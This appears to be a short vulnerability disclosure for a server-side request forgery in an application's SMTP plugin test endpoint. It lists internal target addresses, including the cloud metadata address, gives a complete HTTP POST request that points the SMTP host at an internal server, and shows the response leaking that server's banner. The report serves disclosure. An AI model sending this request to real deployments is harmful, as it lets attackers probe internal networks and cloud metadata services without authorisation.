The SMTP plugin doesn't have verification or validation, allowing the attacker to make requests to internal servers and get the contents.
169.254.169.254, 192.168.0.1, 127.0.0.1
POST /api/v1/db/meta/plugins/test HTTP/1.1
Host: 192.168.15.50:8080
Content-Length: 129
Accept: application/json, text/plain, */*
xc-gui: true
xc-auth:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Content-Type: application/json
Origin: http://192.168.15.50:8080
Referer: http://192.168.15.50:8080/dashboard/
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: refresh_token=
Connection: close
{"input":{"from":"","host":"192.168.15.41","port":"1337","secure":""},"id":"nc_rb4gaggzddwut5","category":"Email","title":"SMTP"}
{"msg":"Invalid greeting. response=[INTERAL] - SUPERADMIN MANAGMENT SYSTEM PRIVATE: [INTERAL] - SUPERADMIN MANAGMENT SYSTEM PRIVATE"}
https://drive.google.com/file/d/1hCJ8nXpssBRq7sV8JN73oXupN_zPWN-T/view?usp=sharing